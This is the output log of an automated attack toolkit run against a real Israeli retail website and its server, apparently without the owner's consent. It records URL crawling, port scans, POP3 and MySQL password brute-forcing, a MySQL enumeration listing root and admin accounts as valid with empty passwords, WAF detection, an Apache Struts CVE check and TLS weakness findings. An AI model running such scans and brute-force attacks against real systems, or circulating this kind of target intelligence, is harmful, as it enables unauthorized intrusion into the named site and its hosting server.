2015 _[ - ]::--------------------------------------------------------------------------------------------------------------
2016|_[ + ] [ 85 / 100 ]-[04:34:29] [ - ]
2017|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-ב×לעזר ]
2018|_[ + ] Exploit::
2019|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2020|_[ + ] More details:: / - / , ISP:
2021|_[ + ] Found:: UNIDENTIFIED
2022
2023 _[ - ]::--------------------------------------------------------------------------------------------------------------
2024|_[ + ] [ 86 / 100 ]-[04:34:31] [ - ]
2025|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-ב×רי×ל ]
2026|_[ + ] Exploit::
2027|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2028|_[ + ] More details:: / - / , ISP:
2029|_[ + ] Found:: UNIDENTIFIED
2030
2031 _[ - ]::--------------------------------------------------------------------------------------------------------------
2032|_[ + ] [ 87 / 100 ]-[04:34:33] [ - ]
2033|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-במכמורת ]
2034|_[ + ] Exploit::
2035|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2036|_[ + ] More details:: / - / , ISP:
2037|_[ + ] Found:: UNIDENTIFIED
2038
2039 _[ - ]::--------------------------------------------------------------------------------------------------------------
2040|_[ + ] [ 88 / 100 ]-[04:34:36] [ - ]
2041|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-ב×דמית ]
2042|_[ + ] Exploit::
2043|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2044|_[ + ] More details:: / - / , ISP:
2045|_[ + ] Found:: UNIDENTIFIED
2046
2047 _[ - ]::--------------------------------------------------------------------------------------------------------------
2048|_[ + ] [ 89 / 100 ]-[04:34:38] [ - ]
2049|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-×‘× ×’×” ]
2050|_[ + ] Exploit::
2051|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2052|_[ + ] More details:: / - / , ISP:
2053|_[ + ] Found:: UNIDENTIFIED
2054
2055 _[ - ]::--------------------------------------------------------------------------------------------------------------
2056|_[ + ] [ 90 / 100 ]-[04:34:40] [ - ]
2057|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-×§×˜× ×™×-ב××¢×¦× ]
2058|_[ + ] Exploit::
2059|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2060|_[ + ] More details:: / - / , ISP:
2061|_[ + ] Found:: UNIDENTIFIED
2062
2063 _[ - ]::--------------------------------------------------------------------------------------------------------------
2064|_[ + ] [ 91 / 100 ]-[04:34:42] [ - ]
2065|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-טובי×-במגן ]
2066|_[ + ] Exploit::
2067|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2068|_[ + ] More details:: / - / , ISP:
2069|_[ + ] Found:: UNIDENTIFIED
2070
2071 _[ - ]::--------------------------------------------------------------------------------------------------------------
2072|_[ + ] [ 92 / 100 ]-[04:34:44] [ - ]
2073|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨× ×™×-במבצע-×פיק ]
2074|_[ + ] Exploit::
2075|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2076|_[ + ] More details:: / - / , ISP:
2077|_[ + ] Found:: UNIDENTIFIED
2078
2079 _[ - ]::--------------------------------------------------------------------------------------------------------------
2080|_[ + ] [ 93 / 100 ]-[04:34:46] [ - ]
2081|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-לילדי×-ב×שקלון ]
2082|_[ + ] Exploit::
2083|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2084|_[ + ] More details:: / - / , ISP:
2085|_[ + ] Found:: UNIDENTIFIED
2086
2087 _[ - ]::--------------------------------------------------------------------------------------------------------------
2088|_[ + ] [ 94 / 100 ]-[04:34:49] [ - ]
2089|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-פquotת ]
2090|_[ + ] Exploit::
2091|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2092|_[ + ] More details:: / - / , ISP:
2093|_[ + ] Found:: UNIDENTIFIED
2094
2095 _[ - ]::--------------------------------------------------------------------------------------------------------------
2096|_[ + ] [ 95 / 100 ]-[04:34:51] [ - ]
2097|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-קצרין ]
2098|_[ + ] Exploit::
2099|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2100|_[ + ] More details:: / - / , ISP:
2101|_[ + ] Found:: UNIDENTIFIED
2102
2103 _[ - ]::--------------------------------------------------------------------------------------------------------------
2104|_[ + ] [ 96 / 100 ]-[04:34:53] [ - ]
2105|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-יוקרתיי×-בגלילות ]
2106|_[ + ] Exploit::
2107|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2108|_[ + ] More details:: / - / , ISP:
2109|_[ + ] Found:: UNIDENTIFIED
2110
2111 _[ - ]::--------------------------------------------------------------------------------------------------------------
2112|_[ + ] [ 97 / 100 ]-[04:34:55] [ - ]
2113|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-חיפה ]
2114|_[ + ] Exploit::
2115|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2116|_[ + ] More details:: / - / , ISP:
2117|_[ + ] Found:: UNIDENTIFIED
2118
2119 _[ - ]::--------------------------------------------------------------------------------------------------------------
2120|_[ + ] [ 98 / 100 ]-[04:34:57] [ - ]
2121|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-גבוהי×-בחורפיש ]
2122|_[ + ] Exploit::
2123|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2124|_[ + ] More details:: / - / , ISP:
2125|_[ + ] Found:: UNIDENTIFIED
2126
2127 _[ - ]::--------------------------------------------------------------------------------------------------------------
2128|_[ + ] [ 99 / 100 ]-[04:35:00] [ - ]
2129|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-ומיטות-×‘×¡×›× ×™×Ÿ ]
2130|_[ + ] Exploit::
2131|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2132|_[ + ] More details:: / - / , ISP:
2133|_[ + ] Found:: UNIDENTIFIED
2134
2135[ INFO ] [ Shutting down ]
2136[ INFO ] [ End of process INURLBR at [23-01-2019 04:35:00]
2137[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
2138[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-babylon-woodline.co.il ]
2139|_________________________________________________________________________________________
2140
2141\_________________________________________________________________________________________/
2142#######################################################################################################################################
2143Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:35 EST
2144NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
2145NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
2146NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
2147Nmap scan report for babylon-woodline.co.il (62.90.134.182)
2148Host is up (0.23s latency).
2149rDNS record for 62.90.134.182: server.webid.co.il
2150
2151PORT STATE SERVICE VERSION
2152110/tcp open pop3 Dovecot DirectAdmin pop3d
2153| pop3-brute:
2154| Accounts: No valid accounts found
2155|_ Statistics: Performed 205 guesses in 183 seconds, average tps: 1.0
2156|_pop3-capabilities: STLS PIPELINING TOP CAPA USER SASL(PLAIN) AUTH-RESP-CODE RESP-CODES UIDL
2157Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2158Device type: general purpose|firewall|storage-misc|VoIP phone
2159Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
2160OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
2161Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 3.10 (89%), Linux 3.4 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
2162No exact OS matches for host (test conditions non-ideal).
2163Network Distance: 17 hops
2164
2165TRACEROUTE (using port 110/tcp)
2166HOP RTT ADDRESS
21671 144.29 ms 10.246.200.1
21682 144.46 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
21693 144.33 ms 176.10.83.34
21704 144.34 ms sfia-b2-link.telia.net (62.115.148.144)
21715 177.54 ms prag-bb1-link.telia.net (62.115.119.72)
21726 176.93 ms ffm-bb4-link.telia.net (62.115.133.79)
21737 188.63 ms ffm-b1-link.telia.net (62.115.121.3)
21748 179.30 ms 80.239.196.190
21759 ...
217610 230.41 ms gw2-3-1-4-hfa-gw2-fra.nv.net.il (212.143.12.76)
217711 229.99 ms 212.143.7.39
217812 231.18 ms core1-rha2-0-0-core1-hfa.nv.net.il (207.232.0.17)
217913 232.71 ms core1-rha-1-0-0-core1-hfa-5-0-7.nv.net.il (212.143.12.117)
218014 234.61 ms 212.143.201.190
218115 230.49 ms 82-166-37-254.barak-online.net (82.166.37.254)
218216 232.03 ms 62-90-134-178.barak.net.il (62.90.134.178)
218317 232.06 ms server.webid.co.il (62.90.134.182)
2184#######################################################################################################################################
2185
2186 ^ ^
2187 _ __ _ ____ _ __ _ _ ____
2188 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2189 | V V // o // _/ | V V // 0 // 0 // _/
2190 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2191 <
2192 ...'
2193
2194 WAFW00F - Web Application Firewall Detection Tool
2195
2196 By Sandro Gauci && Wendel G. Henrique
2197
2198Checking https://babylon-woodline.co.il
2199Generic Detection results:
2200No WAF detected by the generic detection
2201Number of requests: 14
2202#######################################################################################################################################
2203https://babylon-woodline.co.il [200 OK] Country[ISRAEL][IL], HTTPServer[nginx], IP[62.90.134.182], Title[Secured Home of babylon-woodline.co.il], UncommonHeaders[x-accel-version], nginx
2204#######################################################################################################################################
2205
2206
2207
2208 AVAILABLE PLUGINS
2209 -----------------
2210
2211 PluginChromeSha1Deprecation
2212 PluginHSTS
2213 PluginSessionRenegotiation
2214 PluginHeartbleed
2215 PluginCertInfo
2216 PluginOpenSSLCipherSuites
2217 PluginCompression
2218 PluginSessionResumption
2219
2220
2221
2222 CHECKING HOST(S) AVAILABILITY
2223 -----------------------------
2224
2225 babylon-woodline.co.il:443 => 62.90.134.182:443
2226
2227
2228
2229 SCAN RESULTS FOR BABYLON-WOODLINE.CO.IL:443 - 62.90.134.182:443
2230 ---------------------------------------------------------------
2231
2232 * Deflate Compression:
2233 OK - Compression disabled
2234
2235 * Session Renegotiation:
2236 Client-initiated Renegotiations: OK - Rejected
2237 Secure Renegotiation: OK - Supported
2238
2239 * OpenSSL Heartbleed:
2240 OK - Not vulnerable to Heartbleed
2241
2242 * Certificate - Content:
2243 SHA1 Fingerprint: 2e3f643e5d11a459bd85ab36e5e5593f04c8e51f
2244 Common Name: localhost
2245 Issuer: localhost
2246 Serial Number: 99F758FFACDEEDCB
2247 Not Before: Sep 20 10:18:07 2014 GMT
2248 Not After: Feb 4 10:18:07 2042 GMT
2249 Signature Algorithm: sha1WithRSAEncryption
2250 Public Key Algorithm: rsaEncryption
2251 Key Size: 2048 bit
2252 Exponent: 65537 (0x10001)
2253
2254 * Certificate - Trust:
2255 Hostname Validation: FAILED - Certificate does NOT match babylon-woodline.co.il
2256 Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
2257 Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
2258 Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
2259 Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
2260 Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
2261 Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
2262
2263 * Certificate - OCSP Stapling:
2264 NOT SUPPORTED - Server did not send back an OCSP response.
2265
2266 * SSLV2 Cipher Suites:
2267 Server rejected all cipher suites.
2268
2269 * Session Resumption:
2270 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
2271 With TLS Session Tickets: OK - Supported
2272
2273 * TLSV1_2 Cipher Suites:
2274 Preferred:
2275 ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
2276 Accepted:
2277 ECDHE-RSA-AES256-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
2278 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
2279 ECDHE-RSA-AES256-GCM-SHA384 ECDH-256 bits 256 bits HTTP 200 OK
2280 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
2281 DHE-RSA-AES256-SHA256 DH-2048 bits 256 bits HTTP 200 OK
2282 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
2283 DHE-RSA-AES256-GCM-SHA384 DH-2048 bits 256 bits HTTP 200 OK
2284 CAMELLIA256-SHA - 256 bits HTTP 200 OK
2285 AES256-SHA256 - 256 bits HTTP 200 OK
2286 AES256-SHA - 256 bits HTTP 200 OK
2287 AES256-GCM-SHA384 - 256 bits HTTP 200 OK
2288 ECDHE-RSA-AES128-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
2289 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
2290 ECDHE-RSA-AES128-GCM-SHA256 ECDH-256 bits 128 bits HTTP 200 OK
2291 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
2292 DHE-RSA-AES128-SHA256 DH-2048 bits 128 bits HTTP 200 OK
2293 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
2294 DHE-RSA-AES128-GCM-SHA256 DH-2048 bits 128 bits HTTP 200 OK
2295 CAMELLIA128-SHA - 128 bits HTTP 200 OK
2296 AES128-SHA256 - 128 bits HTTP 200 OK
2297 AES128-SHA - 128 bits HTTP 200 OK
2298 AES128-GCM-SHA256 - 128 bits HTTP 200 OK
2299 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
2300 DES-CBC3-SHA - 112 bits HTTP 200 OK
2301
2302 * TLSV1_1 Cipher Suites:
2303 Preferred:
2304 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
2305 Accepted:
2306 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
2307 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
2308 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
2309 CAMELLIA256-SHA - 256 bits HTTP 200 OK
2310 AES256-SHA - 256 bits HTTP 200 OK
2311 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
2312 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
2313 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
2314 CAMELLIA128-SHA - 128 bits HTTP 200 OK
2315 AES128-SHA - 128 bits HTTP 200 OK
2316 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
2317 DES-CBC3-SHA - 112 bits HTTP 200 OK
2318
2319 * TLSV1 Cipher Suites:
2320 Preferred:
2321 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
2322 Accepted:
2323 ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits HTTP 200 OK
2324 DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits HTTP 200 OK
2325 DHE-RSA-AES256-SHA DH-2048 bits 256 bits HTTP 200 OK
2326 CAMELLIA256-SHA - 256 bits HTTP 200 OK
2327 AES256-SHA - 256 bits HTTP 200 OK
2328 ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits HTTP 200 OK
2329 DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits HTTP 200 OK
2330 DHE-RSA-AES128-SHA DH-2048 bits 128 bits HTTP 200 OK
2331 CAMELLIA128-SHA - 128 bits HTTP 200 OK
2332 AES128-SHA - 128 bits HTTP 200 OK
2333 ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits HTTP 200 OK
2334 DES-CBC3-SHA - 112 bits HTTP 200 OK
2335
2336 * SSLV3 Cipher Suites:
2337 Server rejected all cipher suites.
2338
2339
2340
2341 SCAN COMPLETED IN 19.40 S
2342 -------------------------
2343Version: 1.11.12-static
2344OpenSSL 1.0.2-chacha (1.0.2g-dev)
2345
2346Connected to 62.90.134.182
2347
2348Testing SSL server babylon-woodline.co.il on port 443 using SNI name babylon-woodline.co.il
2349
2350 TLS Fallback SCSV:
2351Server supports TLS Fallback SCSV
2352
2353 TLS renegotiation:
2354Secure session renegotiation supported
2355
2356 TLS Compression:
2357Compression disabled
2358
2359 Heartbleed:
2360TLS 1.2 not vulnerable to heartbleed
2361TLS 1.1 not vulnerable to heartbleed
2362TLS 1.0 not vulnerable to heartbleed
2363
2364 Supported Server Cipher(s):
2365Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
2366Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
2367Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
2368Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
2369Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
2370Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2371Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
2372Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2373Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
2374Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2375Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
2376Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2377Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2378Accepted TLSv1.2 128 bits AES128-GCM-SHA256
2379Accepted TLSv1.2 256 bits AES256-GCM-SHA384
2380Accepted TLSv1.2 128 bits AES128-SHA256
2381Accepted TLSv1.2 256 bits AES256-SHA256
2382Accepted TLSv1.2 128 bits AES128-SHA
2383Accepted TLSv1.2 256 bits AES256-SHA
2384Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2385Accepted TLSv1.2 256 bits CAMELLIA256-SHA
2386Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2387Accepted TLSv1.2 128 bits CAMELLIA128-SHA
2388Accepted TLSv1.2 112 bits DES-CBC3-SHA
2389Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2390Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2391Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2392Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2393Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2394Accepted TLSv1.1 128 bits AES128-SHA
2395Accepted TLSv1.1 256 bits AES256-SHA
2396Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2397Accepted TLSv1.1 256 bits CAMELLIA256-SHA
2398Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2399Accepted TLSv1.1 128 bits CAMELLIA128-SHA
2400Accepted TLSv1.1 112 bits DES-CBC3-SHA
2401Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
2402Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
2403Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
2404Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
2405Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
2406Accepted TLSv1.0 128 bits AES128-SHA
2407Accepted TLSv1.0 256 bits AES256-SHA
2408Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
2409Accepted TLSv1.0 256 bits CAMELLIA256-SHA
2410Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
2411Accepted TLSv1.0 128 bits CAMELLIA128-SHA
2412Accepted TLSv1.0 112 bits DES-CBC3-SHA
2413
2414 SSL Certificate:
2415Signature Algorithm: sha1WithRSAEncryption
2416RSA Key Strength: 2048
2417
2418Subject: localhost
2419Issuer: localhost
2420
2421Not valid before: Sep 20 10:18:07 2014 GMT
2422Not valid after: Feb 4 10:18:07 2042 GMT
2423#######################################################################################################################################
2424Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:40 EST
2425NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
2426NSE: [mysql-brute] usernames: Time limit 10m00s exceeded.
2427NSE: [mysql-brute] passwords: Time limit 10m00s exceeded.
2428Nmap scan report for babylon-woodline.co.il (62.90.134.182)
2429Host is up (0.23s latency).
2430rDNS record for 62.90.134.182: server.webid.co.il
2431
2432PORT STATE SERVICE VERSION
24333306/tcp open mysql MySQL 5.5.60-MariaDB
2434| mysql-brute:
2435| Accounts: No valid accounts found
2436|_ Statistics: Performed 15932 guesses in 600 seconds, average tps: 26.6
2437| mysql-enum:
2438| Valid usernames:
2439| root:<empty> - Valid credentials
2440| netadmin:<empty> - Valid credentials
2441| guest:<empty> - Valid credentials
2442| user:<empty> - Valid credentials
2443| web:<empty> - Valid credentials
2444| sysadmin:<empty> - Valid credentials
2445| administrator:<empty> - Valid credentials
2446| webadmin:<empty> - Valid credentials
2447| admin:<empty> - Valid credentials
2448| test:<empty> - Valid credentials
2449|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
2450| mysql-info:
2451| Protocol: 10
2452| Version: 5.5.60-MariaDB
2453| Thread ID: 11651486
2454| Capabilities flags: 63487
2455| Some Capabilities: ConnectWithDatabase, Support41Auth, Speaks41ProtocolOld, DontAllowDatabaseTableColumn, LongPassword, Speaks41ProtocolNew, InteractiveClient, FoundRows, SupportsLoadDataLocal, IgnoreSigpipes, SupportsTransactions, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
2456| Status: Autocommit
2457| Salt: >4+yC!y_OQ&jd5|3&eI!
2458|_ Auth Plugin Name: mysql_native_password
2459Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2460Device type: general purpose|firewall|storage-misc|VoIP phone
2461Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
2462OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
2463Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
2464No exact OS matches for host (test conditions non-ideal).
2465Network Distance: 16 hops
2466
2467TRACEROUTE (using port 3306/tcp)
2468HOP RTT ADDRESS
24691 143.63 ms 10.246.200.1
24702 143.68 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
24713 143.68 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
24724 143.70 ms sfia-b2-link.telia.net (62.115.148.144)
24735 176.88 ms 80.91.253.248
24746 176.92 ms 62.115.133.79
24757 181.16 ms ffm-b1-link.telia.net (62.115.137.165)
24768 176.96 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
24779 ...
247810 228.80 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
247911 232.65 ms 212.143.7.35
248012 234.84 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
248113 237.60 ms 212.143.201.205
248214 238.94 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
248315 233.80 ms 62-90-134-178.barak.net.il (62.90.134.178)
248416 233.22 ms server.webid.co.il (62.90.134.182)
2485#######################################################################################################################################
2486 + -- --=[Port 8000 closed... skipping.
2487 + -- --=[Port 8100 closed... skipping.
2488 + -- --=[Port 8080 opened... running tests...
2489
2490 ^ ^
2491 _ __ _ ____ _ __ _ _ ____
2492 ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
2493 | V V // o // _/ | V V // 0 // 0 // _/
2494 |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
2495 <
2496 ...'
2497
2498 WAFW00F - Web Application Firewall Detection Tool
2499
2500 By Sandro Gauci && Wendel G. Henrique
2501
2502Checking http://babylon-woodline.co.il:8080
2503The site http://babylon-woodline.co.il:8080 is behind a Imperva SecureSphere
2504Number of requests: 9
2505
2506http://babylon-woodline.co.il:8080 [301 Moved Permanently] Apache[2], Country[ISRAEL][IL], HTTPServer[Apache/2], IP[62.90.134.182], RedirectLocation[/index.1.html]
2507http://babylon-woodline.co.il:8080/index.1.html [200 OK] Apache[2], Country[ISRAEL][IL], HTML5, HTTPServer[Apache/2], IP[62.90.134.182], JQuery, Meta-Author[ישר×ל ממליץ], Open-Graph-Protocol, Script[text/javascript], Title[×ž×–×¨×•× ×™× ×œ×™×™×Ÿ]
2508
2509Version: 1.11.12-static
2510OpenSSL 1.0.2-chacha (1.0.2g-dev)
2511
2512Connected to 62.90.134.182
2513
2514Testing SSL server babylon-woodline.co.il on port 8080 using SNI name babylon-woodline.co.il
2515
2516 TLS Fallback SCSV:
2517Server does not support TLS Fallback SCSV
2518
2519 TLS renegotiation:
2520Session renegotiation not supported
2521
2522 TLS Compression:
2523Compression disabled
2524
2525 Heartbleed:
2526TLS 1.2 not vulnerable to heartbleed
2527TLS 1.1 not vulnerable to heartbleed
2528TLS 1.0 not vulnerable to heartbleed
2529
2530 Supported Server Cipher(s):
2531#######################################################################################################################################
2532Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:59 EST
2533Nmap scan report for babylon-woodline.co.il (62.90.134.182)
2534Host is up (0.23s latency).
2535rDNS record for 62.90.134.182: server.webid.co.il
2536
2537PORT STATE SERVICE VERSION
25388080/tcp open ssl/http-proxy Apache/2
2539|_http-server-header: Apache/2
2540|_http-vuln-cve2017-5638: ERROR: Script execution failed (use -d to debug)
2541Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
2542Device type: general purpose|firewall|storage-misc|VoIP phone
2543Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
2544OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
2545Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.39 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
2546No exact OS matches for host (test conditions non-ideal).
2547Network Distance: 17 hops
2548
2549TRACEROUTE (using port 8080/tcp)
2550HOP RTT ADDRESS
